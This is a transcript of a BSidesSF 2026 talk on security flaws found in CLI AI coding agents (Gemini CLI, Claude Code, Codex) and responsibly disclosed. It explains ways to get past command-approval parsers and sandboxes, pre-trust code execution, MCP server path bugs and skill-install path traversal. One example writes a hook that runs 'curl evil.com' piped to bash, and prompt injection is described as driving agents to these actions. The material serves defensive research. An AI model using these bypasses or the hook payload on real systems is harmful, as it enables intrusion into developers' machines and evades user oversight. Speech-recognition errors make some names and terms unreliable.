Not My Vibe: When AI Coding Agents Go Off the Rails

Name: Not My Vibe: When AI Coding Agents Go Off the Rails
Uploaded: 2026-05-12
Duration: 45 min 56 s
Description: A reverse-engineering study of CLI-based AI coding agents — Gemini CLI, Claude Code, and Codex — that uncovers systemic flaws including command injection, sandbox escapes, workspace trust issues, MCP server vulnerabilities, and zip-slip variants in skills/bundle installation. The speakers walk throu

BSidesSF · 202645:5696 viewsPublished 2026-05Watch on YouTube ↗

Speakers

Aonan Guan Zhengyu Liu

Tags

CategoryResearch

TopicAI/ML Security GenAI Security Vulnerability Research

DifficultyIntermediary

TeamRed

ResearchCase Studies and Incidents Analysis Technical Deep-dives

StyleTalk

Mentioned in this talk

Tools used

Cloud Code Codex Gemini CLI VS Code

Service

Claude

Protocols

Model Context Protocol

About this talk

A reverse-engineering study of CLI-based AI coding agents — Gemini CLI, Claude Code, and Codex — that uncovers systemic flaws including command injection, sandbox escapes, workspace trust issues, MCP server vulnerabilities, and zip-slip variants in skills/bundle installation. The speakers walk through responsibly disclosed exploits, trace how agent security architectures evolved release by release, and offer recommendations for building safer, sandboxed, and verifiable agents.

Show original YouTube description

Not My Vibe: When AI Coding Agents Go Off the Rails Aonan Guan, Zhengyu Liu We reveal a new attack surface in CLI AI agents. By reversing Gemini CLI, Claude Code, and Codex we found systemic flaws — command injection, workspace escapes, and cross-process RCEs. We demonstrate real exploits (responsibly fixed) and share lessons for safer, sandboxed, verifiable agents. https://bsidessf2026.sched.com/event/0a21cf65939a3e2eb38e20dc53b9d782

Show transcript [en]

I will present to you our presenters. They're going to talk about "Not My Vibe: When AI Coding Agents Go Off the Rails." Take it away.

Thank you. Thank you everyone.

So we are Jungu and Gavin. Gavin, for passport and visa, cannot come here today, but he also contributed a lot. Thanks to Gavin. If you use Cloud Code, Gemini CLI, or Code, or any AI agents before — you know, vibe coding — so you tap a prompt and the agent writes the code and runs the command, edits your files. And if you feel it's magic, today we're going to show you what happens when that magic goes wrong and how the security of these tools has evolved in real time over the past years.

A quick show of your hands: how many of you have used an AI agent in the last months? And how many of you have used YOLO mode, or auto-approve mode, or skip dangerous command? Okay, I see fewer hands. If you're using that mode, this talk is specially for you, and you will learn a lot.

So a quick introduction: I'm the security engineer at WiseLives, and Jungu is a PhD student at Johns Hopkins University, and Gavin is an independent researcher. Together we have been doing deep-dive security research on AI coding agents, specifically the CLI-based agents. Over the past year, we have reported vulnerabilities in both Google and Anthropic, received multiple bounties, and today we're sharing what we learned from them. Our approach was different from typical security research. We did not only fuzz the endpoint; we also learned from the code, from the very early version to release by release, and tracked how their security architecture evolved. And this is the story we are telling today.

This is one screenshot I took from Steve's blog post, and his blog post talks about the future of coding agents. It captures the trend perfectly. So in 2024, we have autocomplete, just like figure one, the green lines — we have autocomplete inline. And then in 2025, people are starting to use the IDE extension that asks a yes and no before doing things, just like figure two. And then come the YOLO mode and figure three, and the agent just does everything without asking. People are starting to make a YOLO. And now figure four and beyond: the agent has taken over the whole IDE and then taken over the whole workflow. The key insight here is, as the agents get more autonomous, the security surface explodes, and every new capability is a new attack vector.

Let's take a look at how CLI agents work. So let's ground ourselves. To simplify, it's pretty simple, as five steps. You launch it in your directory — that's your current working directory — and this becomes the agent's, and it sets a trusted boundary here. And you tap your natural language prompt to it and everything, just like "fix this bug" and "add a new login page," and you will send your prompt to the remote LLM. And then the LLM responds with an actionable action, just like "run this command," "add a file with the specific file name." And then the local LLM agent harness will parse that response to an executable tool call, and that tool call will ask for your permission. And the permission step, just like a step filter — that's the entire security model. And the local agent is the gatekeeper between the LLM intention and the actual system. And as we will see, the gatekeeper has a lot of holes here.

Let's take a look at this one as an example. This is the architecture diagram from Google's Gemini CLI that has a DeepWiki to generate it, and it's pretty concrete. On the left, blue, that's the user loop — you tap, you approve it. And in the middle, purple, that's the agent loop — it talks to the LLM and gets a tool request, runs them through a policy engine, and routes the output. The critical path is the right line here, just like from LLM response through the policy to tool call execution. Many vulnerabilities we'll show here today are about bypassing something on that path.

So let's think about how it can go wrong, the risk-facing in the CLI agents. So many people don't realize that when you clone a repo and you open it with your AI agents, you're not starting from a clean state. So just look at the project structure on the left: there are many markdown files, there are many configuration files there, a cloud directory, skill files. In the middle, you can see that's actually the real system prompt from Gemini CLI, and many of these files will be embedded into the system prompt. And this is one of the very good examples of how external files will influence your agent's behavior. And there are even more.

So there are actually three categories here that attackers can control. First is the files in the workspace. The second is the content that the agents retrieve dynamically, just like the tool call read a file or calling from web fetch. And the third one is extended surface, just like the MCP servers or the agent skills that add new tools and capabilities. Each of them is a new trust boundary that the agent crosses without the user necessarily understanding the application. And Jungu will cover the extended surface right after me.

So how can it go wrong? How can it go wrong? This isn't theoretical — these are many real-world examples of how it can go wrong, starting from Gemini CLI to Amazon Q and then to the CI. And especially the Amazon Q and the CI one — both two are the big supply chain issues that influence and affect many other people. And now let's start to see how it actually works.

So we did a systematic empirical study. We went through the source code of Gemini and Cloud Code version by version, basically, and from the very early version we checked the attack release and read the diff and found the architecture. And some of the vulnerabilities we are going to show were found by us, some by other researchers.

Let's start from the foundation first. So it all starts with CWD. So everything starts from CWD, the current working directory. So when you launch your Gemini CLI or other agents, the agent will capture the current working directory. That becomes the very first security boundary. And here's the actual code that I captured from Gemini CLI. I captured this from the very early state, early release from July 2025. On the left, you can see the search result here with the "is within roots." So this function is across the code base. It appears in the glob, appears in read files, appears in edit file and write files. So basically, whenever you want to call these tools to change your code, you'll firstly pass these functions to see if you want to edit a file that's within the current working directory.

It sounds like a perfect solution, like using the CWD as a trust boundary, to make intuitive sense — like you launch your agent here and it should only touch the files in your project, right? But what could possibly go wrong? What could possibly go wrong? So turns out, many...

Turns many. So let's take a look. The pass checking sounds simple, but just checking if the pass starts with your root directory turns out to be harder than we think. So I'll show you some CVEs first.

The first CVE is happening in Cloud Code very early version. It's like a prefix tracking, so it checks the current working directory by prefix. If they're sharing the same prefix, you may go wrong. The second one is about symbol link bypass. So simple link is a soft link that you can link your file from your current working directory to the file outside the working directory, and basically it tricks the CLI agents that the file is inside the current working directory. This happens in 2025, but actually in 2026, there were another simple link problem happens again. People think it may be easy or simple problem, but actually it happens multiple times in the production environments and in the production software. We also found this problem in Gemini CLI. These three we presented here were from Clock. We also found the one in Gemini CLI and sent to Google. Although Google doesn't assign CVE to it, but it's still a problem.

Yeah, so let's talk about the big one: the shell tool. Let's take a look at this screenshot. Whenever we want to edit a file outside the current working directory, it will be blocked. So the read file, seeing that I want to read a file outside working directory, is rejected. And then on the right, I'm using a cat to do the similar thing. Basically, I want to read the credential outside the current working directory. It didn't ask for my permission. So what I'm approving now is approving the cat. So the cat doesn't check the current working directory; the read file does. So this is a fundamental problem: the file tools enforce CWD boundaries, but the shell tool doesn't. And it is really hard because the shell can do anything and it has many variations.

So why is it so hard? Just like you can see, there are many shell commands here. That one command root, you can have infinite variations, and now you multiply by every shell built in. That's a real problem. So basically, we want to say be aware of that. Yeah. So why cannot we just parse a shell command easily and block the dangerous command? It turns out it's not an easy problem because shell bash syntax is generally complex. It's a full programming language. And the command list here are some malicious commands, and it is very hard for everybody to parse it, to split it, and to understand it. Semantically, we cannot do it easily. And if we want to use a native split, just like the one showing below, or we want to use regex to understand it, we could go wrong in the end. So we need a real parser.

Let's see how Gemini CLI built a parser. Let's trace the evolution. This is one from Gemini very early version, from 0.1.8, the very first version. All the shell parsing logic was inline in the tool class, only 115 lines of code, and it is pretty simple. And to bypass, just a simple semicolon to chain your command, and then you will bypass the approval command, and attacker can append their malicious command to it and bypass occur in the detecting system.

And later on in 0.18, they added detect command substitution and the dedicated function that tries to catch the dollar sign, catch a backtick substitution, catch the process substitution. But look at the red box here, it is still missing. Currently it can detect the left bracket, but actually it's missing the right bracket. So we report this process substitution prevention because this prevention is impartial, and Google accepted it and fixed it in the later version.

Now, since we have been seeing many problems here that could not be easily solved by regex, by simple rule matching, Google start to use the real parser Tree-sitter. In case you don't know, Tree-sitter is a parser that can parse the command language that has been used in VS Code for syntax highlights, and this is the same parser that use in VS Code. And it understands the full bash grammar, coding rules, and process substitution, everything related to the process arguments and strings. And this is a massive upgrade from regex splitting, but it took three months for Google to achieve that, from July to October. And to make it actually work properly, they spend another six months.

So even when they have the Tree-sitter, the real parser, there was still a big problem. Let's take a good example here. Let's take the time command as an example. So this time command is used to measure the performance of a command. So you will trace the command execution invocation and measure the performance of the time that it was invoked. So when the user trusted time, they were trusting time. But what actually Gemini sees, it's like you will trust all the following command. So you will trust all following command behind time. So what Gemini CLI sees here is like, when an attacker appends another malicious command after time, just like a Python invocation, then Gemini will trust it, and then that's a problem. So this problem still happens in Gemini CLI 0.2.8. They just fixed it last month, February 2026. So in Gemini CLI 0.229, they fix it. They just fixed it the last month.

So yeah, it's time. So here's a comparison about the different milestone of Gemini CLI, and similar problems also happens to other CLI agents. For time limitation, we cannot explain one by one all of the bypasses, but you can take a look at this table as an example. And also just notice that Google even spent about more than 9 months to make it work properly. And 9 months of evolution from simple string to compiler level parsing — this is a trend of the security in this space, and it is still not complete. And not only just Gemini. So this is the one we captured from Cloud Code's record. This is a full table of CVE, and our shell command bypassing look like a whack-a-mole. So nine different bypasses and n CVE, and I believe there will be more, just like a weapon game.

So let's take a look at this timeline. And the pattern is pretty clear: the defense depends, but the attack escalates. So every new defense creates new edge cases that can be exploited, and the attacker can always one step higher because they only need to build one bypass technique, while the defender needs to cover all of the edge cases. And it's pretty complicated problem. That's why we need another approach. That's why we need sandbox approach. And let's invite Jungu for talking about the further techniques.

>> Okay, thank you Anna. So I'll take over. So it looks like that the shell

Parsing is a losing game, simply because you can never fully understand what a shell command will do by just parsing it. So why not just sandbox everything? We can run the agent in a restricted environment where it physically cannot access the files outside the project, or reach the remote targets it is not allowed to. And actually, people have been thinking about this problem a long time ago, right? Today we already have lots of reliable sandboxes. So why not use them?

What you're looking at here is bubble wrap on Linux, and they use kernel namespaces to create isolated resource names like the file system, PID, network namespace, and hostname namespace, and pair it with seccomp. Basically, you can filter out all the syscalls you want to block. And the idea could be very simple, right? Instead of trying to understand every possible shell command that the LLM would want to give you, you just make sure that when it gets executed, it will fail. It will never succeed.

And here is basically a landscape of the current sandbox technologies across the platforms. It's not a complete list, but gives you an overview. For example, for macOS we have Seatbelt — it's a kernel-level policy file that restricts the file size, network operations, and syscall bypass and operation, and this is what Apple has been using for app sandboxing. On Linux we have bubble wrap plus seccomp for lightweight namespace isolation with syscall filtering. And if you want something fancier and more complex, you can go gVisor — it's a user space kernel that reimplements the syscalls so that the application will never talk to the host kernel directly. And on Windows we have terminal things like restricted token plus job objects for process-level restrictions. So we can actually fully take a bunch of those sandboxes, right?

And now here is where it gets really interesting. All the three major CLI agents — the Gemini, Claude Code, and Codex — support sandboxing, but it looks like they approach it in different ways. For example, take Codex as an example. It's a sandbox-first approach, and actually it's the only one that will always enable the sandbox by default. Basically, it means that every shell command and every file edit tool that the agent makes will get spawned as a child process wrapped in Seatbelt on macOS or bubble wrap plus seccomp on Linux, and the network is blocked by default. It looks like the most restrictive approach.

And for Gemini, it's disabled by default, unfortunately, but it also provides you a way to basically opt in via a sandbox flag, and in that case it will enable it. The exception is that Gemini can lead to have a config that if you use YOLO mode, it will automatically enable the sandbox. But when enabled, the Gemini CLI did it a slightly different way. It does not basically do something like what Codex is trying to do; it instead sandboxes the entire agent process. So on macOS they also use Seatbelt, and on Linux they use a Docker container. That means that everything — for example, the shell commands, the file reads, and even other in-process reads — will be constrained by the sandbox.

And for Claude Code, it's also disabled by default, and when it's enabled, it does something like Codex — it will try to wrap every individual batch child process in the sandbox and execute it. As you can see, every agent supports sandbox, but not all of them will enable it by default. So if you think they are secure because they claim they have a sandbox, you need to double check whether you have enabled it actually.

And sandbox is also not a silver bullet. What if the sandbox itself has a bug? This is actually a vulnerability we found on 205, and it turns out that someone also identified it. So there's a collision, but that's fine, but we have to share it here. So basically, Claude Code provides a sandbox runtime library, and that library has a config that allows you to specify which domains you want the agent to connect to during the runtime. So basically it's a whitelist of the domains. If you do not pass that config, it means I do not want to set a whitelist, and then it will accept all the outgoing connections. That should work as expected. But if you put something in it — like I put example.com as a list and pass it to it — it means I would only allow the agent to connect to example.com during the runtime, and Claude would do so. This also works.

But what if I pass in an empty array to Claude Code? It will interpret it differently. So basically here as a whitelist, I mean that I do not allow any outgoing domains, but what it actually does is that it allows all the outgoing connections. So there will be a misunderstanding here. And if we look at the code, it's a very simple programming bug, I would say. Basically it tries to check the length of the passed-in allowed domains, and then if it's empty, it would just disable the network policy. So it means that if you set allowed domains to empty, basically allow all the domains.

And let's take a look at another more creative attack against the Claude host sandbox. So far what we understand is that when Claude is running, everything gets constrained. But what if malicious code — probably gets injected by the attackers through some kinds of indirect or direct prompt injection — gets executed and does some normal things during the sandbox time, but after the session is over, it will take its effect? So for example, in this case, during the sandbox session, the malicious code we see in the sandbox would ask the Codex Claude to basically write to the settings.json. It sounds like a normal request because Claude's settings.json suggestion is something available under its own directory and workspace, and it doesn't exist previously. So the sandbox will happily allow it to complete.

But what the agent actually does is basically it creates hooks like session start, curl evil.com, bash. So basically we are trying to override a config file of Claude Code that would take effect when Claude gets executed next time. So the problem is like this: the sandbox would protect the current session, but it doesn't protect the file that can control the next session. And it could be a classic time-of-check and time-of-use attack issue across the next session.

And besides the sandbox, let's look at something similar. So from our last vulnerability we have seen

So we can see that the sandbox protects the runtime, like everything the agents generate and execute during the session. But what if there are codes that can be executed before the sandbox even gets started? So this is what we call the trust before trust problem. Whenever you open a workspace, the agent would prompt you to say, okay, do you want to trust this workspace through a trust dialogue? But what if the code gets executed even before the trust decision even happens? And that's actually how the problem occurs.

For example, in the CVE 598-28, basically the Claude Code would run a yarn version at startup to check your environment. But the yarn command itself can have hooks, right? And it will try to load the plugins from the yarnrc file locally. So if you put any malicious plugins under this rc, when the Claude tries to check your environment during the bootstrapping process, it will get executed. And similarly, the Claude will also read your git config and run git config user email. But what if the attacker can control the user email and pass in a basic command injection payload, like anything, a dollar and wrap a malicious command within it and pass it to this company? Basically, there is another command injection problem happens.

And there are others, right? Previously we have seen that you can control the settings.json and basically that controls how the Claude Code would work entirely. So there are so many problems that happen during the bootstrapping process, and that can trigger the code execution. And in that case, the sandbox won't help.

So to summarize, well, the CL agents have become our everyday coding partners, but here's the reality: that Claude Code alone had 22 cases in 10 months and 19 of them are rated as high. So we're not going to blame Claude here, but instead they're doing a very great job. They are trying to make the disclosure process as transparent as possible and try to fix most of the vulnerabilities. But you can see the trend here: that as a security layer gets hardened, the attackers move to the next one. So don't be surprised when your coding agent gets hacked someday in the near future.

Okay, so let's jump to another topic, which is about the software around the CL agents, because nowadays people use many things around develop and use many things around the CL agents to basically extend its behavior. That's what we call CL extensions. And nowadays there are mainly two types of CL AI agent extensions. The first one is the MCP. I think most of you guys should be aware of this, and if not, basically MCP is just a protocol that connects your agent to external tools and data sources. And usually MCP server is a separate long-running service running in a local process or remotely. For example, a Playwright server for browser automation, or a GitHub MCP that allows your agent to basically retrieve the data from the MCP. And usually your agent would run MCP clients that could communicate with those servers and works like an external call.

Another category just proposed recently is called Skills — not recently, but proposed more recent — it's called Skills. Basically Skills are just packages of instructions, resources, and optional codes that teach your agent about some task-specific workflows. And during the runtime, the agent would see those skill names and descriptions and load the full instructions only when it decides to use one. So both of them basically extend the agent's capability, and you can single MCP as external to call and Skills as a bunch of scripts with descriptions.

But here's something interesting: if we try to compare the security model of the two things, they are different. Take this as an example. Basically if I want to exercise Google at times through Playwright in the sandbox mode, and by using the two ways to do it: on the left, there's a Playwright running as an MCP server and it navigates to the Google.com and interacts with the page, and there's no problem, everything works perfectly. On the right side, if we try to serve the Playwright as agent Skills, it will get some error like it tries to write into the Playwright cache directory, but it will fail and blocked by the sandbox.

And one missing — oh, this is just a simple like a read file problem, that the sandbox rejects you to read something somewhere outside the workspace, but actually it's not. The fundamental difference is that MCP servers are already running process that agents talks to them over a protocol, but not by spawning them. So the sandbox within the agent has nothing to do with the MCP servers. The sandbox has no jurisdiction to those pre-existing process. But for Skills, eventually, although those are tasks or a script, eventually there will be — they will be running using the provided bash tools, right, usually. So at that time, sandbox would apply. But for MCP servers, basically we cannot control it, the sandbox cannot control it. So it won't have any restrictions. So it sounds like MCP servers live outside the box, right?

And for the MCP servers, as you can imagine, even the official ones have a lots of vulnerabilities, and some of them are found by us and those are remarked by YanLo. Just name a few of them. For example, the file system MCP server: there are two CVEs belong to this one. Basically those are all using classic techniques that's used to bypass the workspace restrictions, it's just in another place. The one is using the symlink handling, another one is using colluding path prefix. So it sounds similar because this is exact the same bug we have seen in the CL agent itself, but it's repeated in the MCP server because MCP server are implemented differently.

And also for the Git MCP server, there are also multiple CVEs. For example, the one is because you can run the git init to cause on arbitrary files. So basically you can create a git repo or try to track a file as a git repo on arbitrary file system file path. Another way is argument injection in the git diff, that you can pass specific arguments to the git diff to call and it will give use the arbitrary file override. And another like a path traversal in the git add, that you can basically use git add on an outside file system, outside file that do not belong to the current work directory, and you stage the files. And then because it means validation, you basically can stage the files and try to retrieve the file's content, it will gives you file read. So there are many bugs within those MCP servers.

Another is within the MCP memory servers. So basically it's just a JSON write tool call that when the agent tries to invoke, it will try to write something as a memory to a local JSON file. But it has a loose JSON schema check during the

Right. So basically you can abuse that feature by passing an attacker controlled path and some arbitrary JSON file. Will allows you to compromise arbitrary JSON file rights on the file system, and I believe if you search up the whole MCP servers, there are more than that. And because many of them are just the classic injection problem, because to the agents those are just the two external to cause, and agents may pass some malicious as the two cause arguments, and if your MCP server doesn't handle it correctly, injection happens.

So besides the MCP servers, what's about the distribution and the installation process? So we all know we want to basically explore, discover, and install some arbitrary MCP servers in the wild provided by others. Cloud Code Desktop are basically one approach for that, which is called MCP bundles, and those are official distribution formats that you can use by just dragging and dropping a zip file to the Cloud Desktop and to install an SAP extension. But the problem here is that the MCP use the F flat for compression, and Flight has basically this split dipl slip vulnerability that simply returns the path as stored in the zip and does not validate or sanitize them.

So if a malicious MCP bundles, let's say a zip file that contains a file whose path is do slash slash to traverse to your another pass, and the dip flag would happily extract it there. So that's some classic zip slap vulnerability happens, shown again in the MCP bundles. And besides the MCP server, this dip slap variant also appears in the Gemini in the skills installation process, and we call it skills slip. So basically Gemini provides a very simple command like Gemini skills install, and you just pass a file path to your skills you want to install, and will basically store it on your local system.

But the problem here is that it blindly trusts the SKU's name and then concatenates with the target DIR and uses it as a destination props, and copies all the sources file to that destination pass. So basically if you can provide a skill name that's using some data slash those past traversal patterns, basically you can get your skills copied or write to the arbitrary file path on the victim's systems. And for example, this right to write — for example, if I want to overwrite to the VS Code settings.json, I can write a malicious skill like this.

I put the skills name as past traversal patterns, and internally I have a settings.json, and settings.json is basically a classic VS Code workspace hijacking that you can leverage the VS Code's protocol terminal that integrates profiles. So basically that code will get executed when you try to start terminal in the VS Code, and then hopefully will just copy to there, and when the victim launches another terminal, the code will execute it. And here we have a short video to show how this works.

Yeah. So basically if we want to install a SKUs using Gemini CLI by running this simple command, we can just do it. And Gemini CLI basically will show the correct path that we want to install to, and then the Gemini does alert the user that there's the untrusted skills may affect the agent's runtime by running a malicious command. But the problem is our attacks could happen even earlier, before the agent even gets started. Because once the installation completes, we already inject the command to the VS Code folders settings.json. So in that case, we will hijack the user's next terminal launch to a process. Yeah, as you can see, the code gets executed.

Okay, so we have seen a lot of attacks currently. So what can we do now? To be honest, I don't think there's much things that we can do as a user, because we need to code every day. So we cannot just forbid those ones. But there are some recommendations that may be able to give. The first one is: do not blindly trust the agent and use the YOLO mode, and treat it as a testing feature but not a production one. Then always keep a human approval step whenever the agent touches your critical repos or things.

And the second is that try to audit your context files, because before your agent gets run, there's lots of files in your workspace can basically control the agent's behavior. For example, the agent IMD, and many of them are treated as the system prompt. So if the attacker controls it, basically it can instruct your agent to do malicious things. And also verify those commands what's being run at the runtime. If anything is too complex to parse at a glance, you should not run them. And then finally, use the sandbox by default. Those sandboxes, at least they are still useful, although you may get a lot of errors, but that's how the sandbox tries to protect you. So basically you can improve it by adjusting the policy that's used by the sandbox day by day. So you can greatly adjust it so that it will work perfectly with your setup.

And those are the things that we can do today. But stepping back, I think stopping prompt injection and command injection led by those prompt injection feels really like an endless game, because every new attack surface, every new agent and the code with around the agent would create basically a new attack surface. So it's very hard to step ahead of the attacker. So what I want to say here is that we still need robust and trusting agent systems, and hopefully we can get our agents more auditable and transparent, and also enable the secure by default mode among all those agents. And hopefully those will deliver both functionality and security in the near future, and that's the something we should keep pushing forward. Thank you. That'll be all of our talks. Thank you.

All right. Thanks. We do have some room for questions. I've got one on Slido again. Slido's how we're going to do this. We're going to try to do this as fast as possible. So earlier you were showing some system prompts. Are those verified, or are they just what the LLM thinks the system prompt is?

Yeah. So for podism, different software have treated differently. For Gemini and Anti-gravity, if there were some markdown that treated in markdown sitted in the workspaces, you will be directly embedded into the system prompt. So from software level, they will embed their whole system prompt, but automatically you will read the file

First and then embed it to the system prompt and then send to the remote LM model. All right, now here's one possible solution. Could an agent review the commands that are issued by the main LLM, or is that just as susceptible?

>> Yeah, so is a question about letting the agent review the command you want to?

>> Right, having one LLM review the other before executing the commands?

>> Actually, I think that is one thing happen in Cloud Code. During our research, we found that Cloud Code sometimes, if they fail the statistical analysis and you will use to could not match the hardcoded Python, you will use Haiku model. From our research, you will use Haiku model — that is a remote small model — to detect the command that you want to execute and to find if this is safe or not, and to find the actual root command. Previously, they doesn't have Tree-sitter. If Tree-sitter cannot find the root amount, you use Haiku model to find the root amount.

>> All right, I've accidentally closed my Slido session. I'm going to take more questions in here. Again, we're at bsidessf.org, or if you go to slido.com and type in the code BSidesSF2026 Theater14, we can get more questions. So how about here within the room? And I apologize if you're in an overflow theater and I can't see your questions.

>> Okay.

>> All right. Oh yeah, go ahead. I'm going to repeat it. So just ask it out loud and I'll say — what are you doing in your? Yeah, so again, I'll repeat this.

>> So you advise against going in YOLO mode, but you know that's what makes the tokens go brr. So what do you do in your personal projects to really get things going?

>> Yeah, actually for my personal project, I never use YOLO mode at all. I really don't use it at all. For all of, I treat it carefully, especially when I found so many there. I could not treat it easily, that every command will be safe. If I cannot treat it like that, and at least for one of the cases, what I'm seeing is, for people are using agent in many autonomous workflow, if you are using build it for your dev spaces, it's okay. It's controllable — the impact is controllable. But if you're using in autonomous workflow, I suggest never use YOLO mode at all, because, you know, autonomous — we do see some autonomous workflow that using YOLO mode, and it's very easy to do prompt injection in it and trigger another problem, and we do see it before. So at least for your personal project, and for your running in your local file system, looking, working directly, and I think you don't know it's successful — although I don't use it, but it's okay.

>> All right, thank you Outjung.

Not My Vibe: When AI Coding Agents Go Off the Rails

Related talks